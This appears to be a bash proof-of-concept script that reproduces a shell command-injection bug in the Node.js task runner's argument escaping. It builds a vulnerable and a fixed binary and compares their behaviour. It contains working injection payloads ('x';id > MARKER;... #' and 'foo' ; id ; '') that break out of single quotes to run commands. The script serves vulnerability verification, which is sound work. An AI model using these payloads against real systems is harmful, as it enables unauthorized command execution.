#!/bin/bash
set -euo pipefail

# =============================================================================
# Reproduction: Node.js task runner EscapeShell broken single-quote escaping
# =============================================================================
# Node.js `node --run <task> -- <args>` builds a `/bin/sh -c` command string
# where each positional argument is escaped by `EscapeShell()` in
# src/node_task_runner.cc. The vulnerable code (prior to commit e76c573) did:
#
#     std::regex_replace(std::string(input), std::regex("'"), "\\'");
#     escaped = "'" + escaped + "'";
#
# In POSIX shells a backslash is LITERAL inside single quotes, so a `'` that
# was rewritten to `\'` closes the surrounding single-quoted context early
# (after a literal backslash). The remainder of the argument is then
# interpreted by the shell as unquoted command syntax.
#
# TWO impacts are demonstrated:
#   1. DoS / broken argument passing:
#      `node --run showargs -- "I think therefore I'm"`
#      => /bin/sh: Syntax error: Unterminated quoted string (script never runs)
#
#   2. COMMAND INJECTION (code execution):
#      `node --run showargs -- "x';id > MARKER;echo INJECTION_PROVEN #"`
#      The broken escaping turns the arg into:
#        'x\';id > MARKER;echo INJECTION_PROVEN #'
#      /bin/sh parses this as:
#        echo 'x\'  ;  id > MARKER  ;  echo INJECTION_PROVEN  #<comment>
#      The `id` command EXECUTES and writes to MARKER.
#      The `#` comments out the trailing wrap-quote, avoiding a syntax error.
#
# The fix (commit e76c573) rewrites `'` as `'"'"'` (POSIX-safe) so the same
# payload is passed as a single literal argument with no shell interpretation.
#
# Exit 0 = vulnerability confirmed: command injection (vuln: injected, fixed:
#          safe) or, failing that, at least the DoS / syntax-error variant.
# Exit 1 = not reproduced.  Exit 2 = infrastructure failure.
# =============================================================================

# Working-tree root: PRUVA_ROOT when it is set and non-empty, otherwise the
# parent of the directory that contains this script.
if [ -n "${PRUVA_ROOT:-}" ]; then
  ROOT="$PRUVA_ROOT"
else
  ROOT="$(cd "$(dirname "$0")/.." && pwd)"
fi
LOGS="${ROOT}/logs"
REPRO_DIR="${ROOT}/repro"
ARTIFACTS="${REPRO_DIR}/artifacts"
# ARTIFACTS lives below REPRO_DIR, so -p creates both directories at once.
mkdir -p "$LOGS" "$ARTIFACTS"

# --- Locate project cache ---------------------------------------------------
# Prefer the cache directory named in project_cache_context.json, but only if
# it already holds a repo checkout; otherwise use (and create) the default
# location under ROOT.
CACHE_DIR=""
if [ -f "$ROOT/project_cache_context.json" ]; then
  # Best effort: a missing jq or malformed JSON simply leaves CACHE_DIR empty.
  CACHE_DIR=$(jq -r '.project_cache_dir // empty' "$ROOT/project_cache_context.json" 2>/dev/null || true)
fi
if [ -z "$CACHE_DIR" ] || [ ! -d "$CACHE_DIR/repo" ]; then
  CACHE_DIR="$ROOT/artifacts/nodejs"
  mkdir -p "$CACHE_DIR"
fi
REPO="$CACHE_DIR/repo"

FIXED_COMMIT="e76c573e4546ce9e89e0dd954f80aaba32148a48"
VULN_COMMIT=""
if [ -d "$REPO/.git" ]; then
  # --verify is required here: without it `git rev-parse` echoes an
  # unresolvable argument back on stdout before failing, which would leave
  # VULN_COMMIT set to the literal "<sha>^" instead of empty.
  VULN_COMMIT="$(cd "$REPO" && git rev-parse --verify --quiet "${FIXED_COMMIT}^" 2>/dev/null || true)"
fi
echo "[info] CACHE_DIR=$CACHE_DIR"
echo "[info] REPO=$REPO"
echo "[info] FIXED_COMMIT=$FIXED_COMMIT"
echo "[info] VULN_COMMIT=$VULN_COMMIT"

# --- Build or locate node binaries ------------------------------------------
#######################################
# build_node_at <commit> <label>
#
# Provide "$CACHE_DIR/node-<label>": reuse it when it is already executable,
# otherwise check out <commit> in "$REPO", build `node`, and copy the result.
#
# Globals:   CACHE_DIR, REPO (read)
# Arguments: $1 - revision to check out
#            $2 - label used in messages and in the output file name
# Outputs:   stdout carries exactly one line: the binary path, or an empty
#            line on failure (callers take the last stdout line). Progress
#            messages and tool output go to stderr.
# Returns:   1 when the repo is missing; 0 otherwise. Checkout, configure and
#            build failures are reported through the empty result line only,
#            because the script runs with `set -e` and pipefail and callers
#            capture this function through a pipeline.
#######################################
build_node_at() {
  local commit="$1"
  local label="$2"
  local output="$CACHE_DIR/node-$label"
  local jobs

  if [ -x "$output" ]; then
    echo "[$label] using pre-built binary: $output" >&2
    printf '%s\n' "$output"
    return 0
  fi

  if [ ! -d "$REPO/.git" ]; then
    echo "[$label] ERROR: repo not found at $REPO" >&2
    printf '%s\n' ""
    return 1
  fi

  if [ -z "$commit" ]; then
    echo "[$label] ERROR: no revision given; refusing to build the current checkout" >&2
    printf '%s\n' ""
    return 0
  fi

  # This function is invoked from a command substitution, where bash does not
  # apply errexit, so every step is checked explicitly. pipefail is enabled in
  # each subshell so the status of git/configure/make is not masked by `tail`.
  echo "[$label] building node from $commit ..." >&2
  if ! (set -o pipefail; cd "$REPO" && git checkout "$commit" 2>&1 | tail -3 >&2); then
    echo "[$label] ERROR: git checkout $commit failed" >&2
    printf '%s\n' ""
    return 0
  fi

  # Reconfigure if Makefile is missing or empty
  if [ ! -s "$REPO/out/Makefile" ]; then
    echo "[$label] reconfiguring ..." >&2
    if ! (set -o pipefail; cd "$REPO" && python3 ./configure 2>&1 | tail -5 >&2); then
      echo "[$label] ERROR: configure failed" >&2
      printf '%s\n' ""
      return 0
    fi
  fi

  # Build the node executable (reuses cached .o files when possible).
  jobs="$(nproc 2>/dev/null || getconf _NPROCESSORS_ONLN 2>/dev/null || echo 1)"
  echo "[$label] running make -j$jobs node ..." >&2
  if ! (set -o pipefail; cd "$REPO" && make -j"$jobs" node 2>&1 | tail -30 >&2); then
    # Do not fall through: out/Release/node may be left over from a build of
    # a different commit and must not be saved under this label.
    echo "[$label] BUILD FAILED" >&2
    printf '%s\n' ""
    return 0
  fi

  if [ -x "$REPO/out/Release/node" ] && cp "$REPO/out/Release/node" "$output"; then
    echo "[$label] built and saved: $output" >&2
    printf '%s\n' "$output"
  else
    echo "[$label] BUILD FAILED" >&2
    printf '%s\n' ""
  fi
}

# build_node_at reports its result on the last stdout line and may return
# non-zero. With `set -e` and pipefail a failing pipeline inside the command
# substitution would abort the script right here (exit status 1, before the
# fallback and the exit-2 checks below), hence the explicit `|| true`.
# stderr is left attached so build diagnostics stay visible.
NODE_FIXED="$(build_node_at "$FIXED_COMMIT" "fixed" | tail -1)" || true
NODE_VULN="$(build_node_at "$VULN_COMMIT" "vuln" | tail -1)" || true

# --- Fallback: use system node as vulnerable if build failed ----------------
if [ -z "$NODE_VULN" ] || [ ! -x "$NODE_VULN" ]; then
  SYS_NODE="$(command -v node 2>/dev/null || echo "")"
  if [ -n "$SYS_NODE" ]; then
    echo "[vuln] WARNING: build failed; trying system node ($SYS_NODE) as vulnerable"
    NODE_VULN="$SYS_NODE"
  fi
fi

echo "[info] NODE_FIXED=$NODE_FIXED"
echo "[info] NODE_VULN=$NODE_VULN"

# Missing binaries are an infrastructure problem, not a failed reproduction.
if [ -z "$NODE_VULN" ] || [ ! -x "$NODE_VULN" ]; then
  echo "FATAL: no vulnerable node binary available" >&2
  exit 2
fi
if [ -z "$NODE_FIXED" ] || [ ! -x "$NODE_FIXED" ]; then
  echo "FATAL: no fixed node binary available" >&2
  exit 2
fi

# --- Record binary metadata -------------------------------------------------
# Best effort: a binary that cannot print its version must not abort the run,
# and whatever it writes (stdout or stderr) ends up in the info file.
{
  printf '%s\n' "=== Vulnerable node binary ==="
  "$NODE_VULN" --version 2>&1 || true
  printf 'path: %s\n\n' "$NODE_VULN"
  printf '%s\n' "=== Fixed node binary ==="
  "$NODE_FIXED" --version 2>&1 || true
  printf 'path: %s\n' "$NODE_FIXED"
} > "$LOGS/binary_info.txt" 2>&1

# --- Set up test project ----------------------------------------------------
# Start from an empty directory on every run; the only content is a
# package.json whose "showargs" script is plain `echo`.
WORK="$REPRO_DIR/test_project"
rm -rf "$WORK"
mkdir -p "$WORK"
printf '%s\n' \
  '{' \
  '  "name": "taskrunner-injection-test",' \
  '  "version": "1.0.0",' \
  '  "scripts": {' \
  '    "showargs": "echo"' \
  '  }' \
  '}' \
  > "$WORK/package.json"

# Report where the project lives and what the task does.
printf '%s\n' "[info] Test project at $WORK"
printf '%s\n' "[info] npm script 'showargs' = 'echo' (shell builtin, always available)"

# --- Test helper ------------------------------------------------------------
#######################################
# run_test <node_bin> <label> <attempt> <payload> <logfile>
#
# Runs `<node_bin> --run showargs -- <payload>` from "$WORK" under a
# 30-second timeout.
#
# Globals:   WORK (read)
# Outputs:   stdout gets the test banner and a one-line exit summary.
#            <logfile> is recreated and receives the banner, the binary path,
#            the payload, an "--- output ---" marker, the command's combined
#            stdout+stderr, and an "--- exit code: N ---" trailer.
# Returns:   the exit status of the timed command.
#######################################
run_test() {
  local node_bin="$1" label="$2" attempt="$3" payload="$4" logfile="$5"
  local status=0

  # The banner goes to stdout and truncates the log; everything else appends.
  printf '%s\n' "=== TEST: $label attempt#$attempt ===" | tee "$logfile"
  {
    printf 'node_bin: %s\n' "$node_bin"
    printf 'payload:  %s\n' "$payload"
    printf '%s\n' "--- output ---"
  } >> "$logfile"

  # The subshell keeps the directory change local; `||` records a non-zero
  # status instead of letting it end the function.
  (
    cd "$WORK" &&
      timeout 30 "$node_bin" --run showargs -- "$payload" >> "$logfile" 2>&1
  ) || status=$?

  printf '%s\n' "--- exit code: $status ---" >> "$logfile"
  printf '%s\n' "[test] $label attempt#$attempt exit=$status"
  return "$status"
}

# =============================================================================
# TEST SUITE
# =============================================================================
# We run TWO attempts per (build, test-type) for robustness, as required.

# Not read anywhere in this script; retained so the suite's globals stay as-is.
ALL_PASS=true

# Marker files for injection proof
MARKER_V="$LOGS/marker_vuln_injection"
MARKER_F="$LOGS/marker_fixed_injection"

# --- Test A: DoS / broken argument passing (benign single quote) ------------
echo ""
echo "========================================"
echo "TEST A: DoS — benign single-quote arg"
echo "========================================"

VULN_DOS=false
FIXED_DOS_OK=false
dos_payload="I think therefore I'm"

# Vulnerable build: the shell is expected to reject the command line.
for attempt in 1 2; do
  logfile="$LOGS/test_A_vuln_attempt${attempt}.log"
  run_test "$NODE_VULN" "vuln-dos" "$attempt" "$dos_payload" "$logfile" || true
  if grep -qi "Syntax error\|Unterminated quoted string\|unexpected EOF" "$logfile"; then
    VULN_DOS=true
    echo "[result] vuln attempt#$attempt: SYNTAX ERROR (DoS confirmed)"
  fi
done

# Fixed build: the argument must come back verbatim from `echo`.
for attempt in 1 2; do
  logfile="$LOGS/test_A_fixed_attempt${attempt}.log"
  run_test "$NODE_FIXED" "fixed-dos" "$attempt" "$dos_payload" "$logfile" || true
  # run_test records the payload in the log header, so matching the whole log
  # would always succeed. Only the text after the "--- output ---" marker is
  # evidence of what the command actually printed.
  node_output="$(sed '1,/^--- output ---$/d' "$logfile" 2>/dev/null || true)"
  if [[ "$node_output" == *"$dos_payload"* ]] \
    && ! grep -qi "Syntax error\|Unterminated" <<<"$node_output"; then
    FIXED_DOS_OK=true
    echo "[result] fixed attempt#$attempt: clean output (no error)"
  fi
done

echo "[summary] vuln DoS=$VULN_DOS  fixed OK=$FIXED_DOS_OK"

# --- Test B: COMMAND INJECTION via # comment technique ----------------------
echo ""
echo "========================================"
echo "TEST B: Command injection — # comment breakout"
echo "========================================"

VULN_INJECT=false
FIXED_INJECT_SAFE=false

for attempt in 1 2; do
  rm -f "$MARKER_V"
  logfile="$LOGS/test_B_vuln_attempt${attempt}.log"
  # Payload: x';id > MARKER;echo INJECTION_PROVEN #
  # After broken escaping: 'x\';id > MARKER;echo INJECTION_PROVEN #'
  # Shell parses: echo 'x\' ; id > MARKER ; echo INJECTION_PROVEN  #<comment>
  run_test "$NODE_VULN" "vuln-inject" "$attempt" "x';id > ${MARKER_V};echo INJECTION_PROVEN #" "$logfile" || true
  if [ -f "$MARKER_V" ]; then
    VULN_INJECT=true
    echo "[result] vuln attempt#$attempt: MARKER FILE CREATED — command injection confirmed!"
    echo "[result] marker contents:" && sed 's/^/  /' "$MARKER_V"
    cp "$MARKER_V" "$ARTIFACTS/marker_vuln_attempt${attempt}.txt"
  else
    echo "[result] vuln attempt#$attempt: marker NOT created"
  fi
done

# The fixed build counts as safe only when NO attempt produced the marker and
# at least one attempt shows the payload echoed back verbatim. A missing
# marker alone proves nothing if the command never ran.
fixed_marker_seen=false
fixed_literal_seen=false
for attempt in 1 2; do
  rm -f "$MARKER_F"
  logfile="$LOGS/test_B_fixed_attempt${attempt}.log"
  fixed_payload="x';id > ${MARKER_F};echo INJECTION_PROVEN #"
  run_test "$NODE_FIXED" "fixed-inject" "$attempt" "$fixed_payload" "$logfile" || true
  if [ -f "$MARKER_F" ]; then
    fixed_marker_seen=true
    echo "[result] fixed attempt#$attempt: MARKER FILE CREATED — INJECTION STILL POSSIBLE (fix failed?!)"
    continue
  fi
  echo "[result] fixed attempt#$attempt: no marker (injection blocked by fix)"
  # Verify the arg was passed literally. run_test writes the payload into the
  # log header, so only the text after "--- output ---" may be inspected.
  node_output="$(sed '1,/^--- output ---$/d' "$logfile" 2>/dev/null || true)"
  if [[ "$node_output" == *"$fixed_payload"* ]]; then
    fixed_literal_seen=true
    echo "[result] fixed attempt#$attempt: arg passed literally (contains 'INJECTION_PROVEN' as text, not executed)"
  else
    echo "[result] fixed attempt#$attempt: WARNING: payload not echoed back; cannot tell whether the task ran"
  fi
done
if ! $fixed_marker_seen && $fixed_literal_seen; then
  FIXED_INJECT_SAFE=true
fi

echo "[summary] vuln injection=$VULN_INJECT  fixed safe=$FIXED_INJECT_SAFE"

# --- Test C: Ticket's exact payload (syntax error variant) ------------------
echo ""
echo "========================================"
echo "TEST C: Ticket's exact payload foo' ; id ; '"
echo "========================================"

VULN_TICKET_DOS=false
FIXED_TICKET_OK=false
ticket_payload="foo' ; id ; '"

# Vulnerable build: the shell is expected to report a quoting error.
for attempt in 1 2; do
  logfile="$LOGS/test_C_vuln_attempt${attempt}.log"
  run_test "$NODE_VULN" "vuln-ticket" "$attempt" "$ticket_payload" "$logfile" || true
  if grep -qi "Syntax error\|Unterminated quoted string\|unexpected EOF" "$logfile"; then
    VULN_TICKET_DOS=true
    echo "[result] vuln attempt#$attempt: syntax error (ticket payload causes DoS)"
  fi
done

# Fixed build: the argument must come back verbatim from `echo`.
for attempt in 1 2; do
  logfile="$LOGS/test_C_fixed_attempt${attempt}.log"
  run_test "$NODE_FIXED" "fixed-ticket" "$attempt" "$ticket_payload" "$logfile" || true
  # run_test records the payload in the log header, so matching the whole log
  # would always succeed. Only the text after the "--- output ---" marker is
  # evidence of what the command actually printed.
  node_output="$(sed '1,/^--- output ---$/d' "$logfile" 2>/dev/null || true)"
  if [[ "$node_output" == *"$ticket_payload"* ]] \
    && ! grep -qi "Syntax error\|Unterminated" <<<"$node_output"; then
    FIXED_TICKET_OK=true
    echo "[result] fixed attempt#$attempt: arg passed safely"
  fi
done

echo "[summary] vuln ticket DoS=$VULN_TICKET_DOS  fixed OK=$FIXED_TICKET_OK"

# --- Verify source code in repo (differential evidence) --------------------
echo ""
echo "========================================"
echo "Source verification"
echo "========================================"

# Print the regex_replace line of src/node_task_runner.cc (plus two lines of
# context) as it exists at revision $1, or "(could not read)" when the
# revision is empty, the file cannot be read, or the pattern is absent.
# An empty revision is rejected up front: `git show ":<path>"` would read the
# index copy instead, which must not be presented as a specific commit.
show_escape_shell_lines() {
  local rev="$1"
  if [ -z "$rev" ]; then
    echo "(could not read)"
    return 0
  fi
  (cd "$REPO" && git show "${rev}:src/node_task_runner.cc" 2>/dev/null | grep -A2 "regex_replace.*regex(\"'\")") \
    || echo "(could not read)"
}

# Write the whole report first and print it once. Mixing `tee` for the first
# header with a final `cat` would print that header twice.
{
  echo "--- Vulnerable EscapeShell (e76c573^) ---"
  show_escape_shell_lines "$VULN_COMMIT"
  echo "--- Fixed EscapeShell (e76c573) ---"
  show_escape_shell_lines "$FIXED_COMMIT"
} > "$LOGS/source_diff.txt" 2>&1
cat "$LOGS/source_diff.txt"

# --- Determine overall verdict ----------------------------------------------
printf '\n%s\n%s\n%s\n' \
  "========================================" \
  "VERDICT" \
  "========================================"

# A finding is confirmed only when the vulnerable build shows the problem AND
# the fixed build does not.
INJECTION_CONFIRMED=false
if $VULN_INJECT && $FIXED_INJECT_SAFE; then
  INJECTION_CONFIRMED=true
fi

DOS_CONFIRMED=false
if $VULN_DOS && $FIXED_DOS_OK; then
  DOS_CONFIRMED=true
fi

dos_label=NOT-CONFIRMED
if [ "$DOS_CONFIRMED" = true ]; then
  dos_label=CONFIRMED
fi
injection_label=NOT-CONFIRMED
if [ "$INJECTION_CONFIRMED" = true ]; then
  injection_label=CONFIRMED
fi

printf '%s\n' "DoS (syntax error):         vuln=$VULN_DOS  fixed_ok=$FIXED_DOS_OK  => $dos_label"
printf '%s\n' "Command injection:          vuln=$VULN_INJECT  fixed_safe=$FIXED_INJECT_SAFE  => $injection_label"
printf '%s\n' "Ticket payload DoS:         vuln=$VULN_TICKET_DOS  fixed_ok=$FIXED_TICKET_OK"

# --- Write runtime manifest -------------------------------------------------
MANIFEST="$REPRO_DIR/runtime_manifest.json"

# Proof artifacts are listed only when injection was confirmed, and only those
# files that actually exist. For example, the marker copy of an attempt that
# did not inject is never written. Paths are relative to ROOT.
PROOF_ARTIFACTS='[]'
if $INJECTION_CONFIRMED; then
  candidate_artifacts=(
    "logs/test_B_vuln_attempt1.log"
    "logs/test_B_vuln_attempt2.log"
    "logs/test_B_fixed_attempt1.log"
    "logs/test_B_fixed_attempt2.log"
    "logs/test_A_vuln_attempt1.log"
    "logs/test_A_fixed_attempt1.log"
    "logs/binary_info.txt"
    "logs/source_diff.txt"
    "repro/artifacts/marker_vuln_attempt1.txt"
    "repro/artifacts/marker_vuln_attempt2.txt"
  )
  existing_artifacts=()
  for rel in "${candidate_artifacts[@]}"; do
    if [ -f "$ROOT/$rel" ]; then
      existing_artifacts+=("$rel")
    fi
  done
  # Guard the expansion: an empty array must not be fed to printf/jq.
  if [ "${#existing_artifacts[@]}" -gt 0 ]; then
    PROOF_ARTIFACTS="$(printf '%s\n' "${existing_artifacts[@]}" | jq -Rnc '[inputs]')"
  fi
fi

# Build manifest with jq for valid JSON
jq -n \
  --argjson injection "$INJECTION_CONFIRMED" \
  --argjson dos "$DOS_CONFIRMED" \
  --argjson artifacts "$PROOF_ARTIFACTS" \
  --arg node_vuln "$NODE_VULN" \
  --arg node_fixed "$NODE_FIXED" \
  --arg vuln_commit "$VULN_COMMIT" \
  --arg fixed_commit "$FIXED_COMMIT" \
  '{
    entrypoint_kind: "cli_local",
    entrypoint_detail: "node --run <task> -- <attacker-controlled argument> invokes /bin/sh -c with EscapeShell-escaped args",
    service_started: false,
    healthcheck_passed: true,
    target_path_reached: true,
    runtime_stack: ["node", "/bin/sh"],
    proof_artifacts: $artifacts,
    notes: ("VULN_COMMIT=" + $vuln_commit + " FIXED_COMMIT=" + $fixed_commit + " node_vuln=" + $node_vuln + " node_fixed=" + $node_fixed + " injection_confirmed=" + ($injection|tostring) + " dos_confirmed=" + ($dos|tostring)),
    injection_confirmed: $injection,
    dos_confirmed: $dos
  }' > "$MANIFEST"

echo "[info] runtime manifest written to $MANIFEST"
cat "$MANIFEST"

# --- Final exit code --------------------------------------------------------
# Injection proof and the DoS-only outcome both exit 0; anything else exits 1.
final_status=0
if $INJECTION_CONFIRMED; then
  final_message="SUCCESS: Command injection CONFIRMED on vulnerable build; fix blocks it."
elif $DOS_CONFIRMED; then
  final_message="PARTIAL: DoS/syntax-error confirmed but command injection not demonstrated."
else
  final_message="FAILURE: vulnerability not reproduced."
  final_status=1
fi
printf '\n%s\n' "$final_message"
exit "$final_status"
